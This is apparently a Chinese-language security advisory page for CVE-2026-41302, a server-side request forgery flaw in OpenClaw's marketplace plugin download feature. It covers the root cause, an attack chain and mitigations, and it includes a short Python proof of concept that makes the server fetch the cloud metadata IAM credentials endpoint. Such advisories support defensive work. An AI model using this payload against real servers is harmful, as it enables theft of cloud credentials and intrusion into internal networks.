CVE-2026-41302 CVSS 7.6 高危

CVE-2026-41302 OpenClaw服务端请求伪造漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41302

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.31之前的版本在marketplace插件下载功能中存在SSRF漏洞。由于未对用户提供的URL进行有效过滤，攻击者可利用未受保护的fetch()调用诱导服务器发起任意网络请求，从而探测内网服务或窃取敏感数据。

技术细节

该漏洞根因在于OpenClaw处理第三方插件下载请求时，直接将用户输入的URL参数传递给后端的fetch()函数，缺乏必要的校验与白名单机制。攻击者只需拥有低权限账号并诱导管理员进行交互（或自行触发），即可构造包含内网地址（如127.0.0.1、169.254.169.254等）的恶意请求。服务器解析后，会代替攻击者向目标内网资源发起HTTP请求。由于请求源自受信任的服务器，攻击者可绕过防火墙限制，读取本地元数据、访问内部Web应用或利用其他协议进行攻击。

攻击链分析

STEP 1

1. 侦察

攻击者识别出目标运行的是OpenClaw 2026.3.31之前的版本，并确认marketplace插件下载功能存在。

STEP 2

2. 构造载荷

攻击者构造一个包含内网敏感地址（如AWS元数据服务）的恶意URL，指向插件下载接口。

STEP 3

3. 利用漏洞

攻击者发送请求，服务器端未加校验地执行fetch()，向内网地址发起请求。

STEP 4

4. 数据回传

服务器将获取到的内网响应数据返回给攻击者，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Concept for CVE-2026-41302
# Targeting internal metadata service usually accessible from cloud instances

import requests

target_url = "http://vulnerable-openclaw-instance/api/download_plugin"
malicious_payload = {
    "plugin_url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}

try:
    response = requests.post(target_url, data=malicious_payload)
    if response.status_code == 200:
        print("[+] SSRF Successful! Response:")
        print(response.text)
    else:
        print("[-] Request failed or filtered.")
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw < 2026.3.31

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用marketplace插件下载功能，或在WAF/网关处拦截包含内网IP（如127.0.0.1, 192.168.x.x, 10.x.x.x, 172.16-31.x.x）或元数据服务地址的请求参数。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表